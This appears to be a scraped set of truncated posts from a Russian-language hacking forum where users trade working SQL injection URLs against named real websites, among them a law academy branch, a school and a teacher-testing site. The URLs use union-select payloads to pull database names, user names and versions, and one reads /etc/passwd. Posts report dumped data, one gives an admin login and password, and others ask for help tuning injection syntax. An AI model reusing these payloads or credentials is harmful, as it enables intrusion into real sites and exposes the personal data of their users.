Separate names with a comma.
http://www.bekkin.ru юзер: http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(),1,1)))=109 m...
http://takafol.ru/news.php?g=0+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6+--+;&page=5 бд - db_takafol юзер -...
2Kraneg там на сайте basic авторизация, паролей в бд нет
http://www.photo-kazan.ru...
http://www.rfrap.ru Сайт Ростовского филиала Российской академии правосудия=) юзер:...
Щас получается -- +, а надо что бы было --+ З.ы. Все догнал, я просто убрал в настройках комментарии и сам дописал +--+
помогите пожалуйста, как сделать, что бы прога после комментария -- ставила пробел + (именно плюсиком)
При /* ничего не выводиться, просто белая страница, даже если запрос с лишней кавычкой, никаких ошибок нет, просто белая страница... З.ы. вот...
Помогите пожалуйста, вот нашел уязвимость в таком запросе когда дописываю '+union select или '+order by например дальше после комментария...
http://kazan.ws/cgi-bin/people/print.pl?action=sub&id_sub=-67+union+select+1,2,3,4,concat_ws(0x26,user(),database(),version(),LOAD_FILE('/etc/passw...
Вот вчера ночью совершил набеги на сайты rin.ru юзер - [email protected] бд - news версия mysql - 4.1.20 юзер -...
Assembler,
www.38school.ru http://www.38school.ru/arch.php?id=-7+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5-- бд - seopro_box-school...
попробуй так table_name=любая стандартная таблица должна вывести имя бд где находиться стандартная таблица COLLATIONS, P.s если есть фильтры...
попробуй составить запрос типа...
kevmen переведи свой запрос, у тебя получается вывести названия строк где имя строки char(97 ,100,100,101,100,114,101,113,117,101,115,116,115), а...
Сайт турнира по программированию=) http://www.icl.ru админка - pass:wordplay login: pupucya пароли админов зашифрованы в MYSQL-4.x-Hash вывод...
http://www.uztest.ru на сайте имеется база данных на более чем 7,5 тыс учителей=)) db - uztest3_temp version - 5.0.51a user -...
это поле password, а остальные поля login, email выводятся с нормальной кодировкой, кодировку я менял всеровно ничего не получается // это...
Не подошло ='( Есть ещё варианты?=)
